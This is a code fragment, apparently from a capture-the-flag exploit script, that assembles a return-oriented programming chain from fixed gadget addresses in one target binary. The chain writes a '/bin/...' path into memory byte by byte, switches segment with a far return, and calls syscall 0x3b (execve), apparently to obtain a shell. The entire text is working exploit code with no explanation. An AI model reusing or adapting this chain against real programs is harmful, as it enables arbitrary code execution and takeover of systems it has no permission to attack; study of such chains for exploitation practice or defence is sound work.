payload = p64(0x408c28)
#0x0000000000408c28: pop rsi; ret; 
payload += p64(0x4281bc)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x8000)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x428058)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x2f00)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x428059)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x6200)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x42805a)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x6900)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x42805b)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x6e00)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x42805c)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x2f00)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x42805d)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x6600)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x42805e)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x6800)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x42805f)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x0)+p64(0x4077e7)
# 0x00000000004077e7: add byte ptr [rsi], ah; ret; 
payload += p64(0x41f60e)
# 0x41f60e: pop rdi ; retf
payload += p64(0x428058)+p32(0x41d4dc)+p32(0x33)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x36b27fd1)+p64(0x401314)
# 0x0000000000401314: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x408c28)
# 0x0000000000408c28: pop rsi; ret; 
payload += p64(0x0)+p64(0x41d4dc)
# 0x000000000041d4dc: pop rax; ret; 
payload += p64(0x3b)+p64(0x40f2c7)
# 0x000000000040f2c7: syscall; 
payload += b''
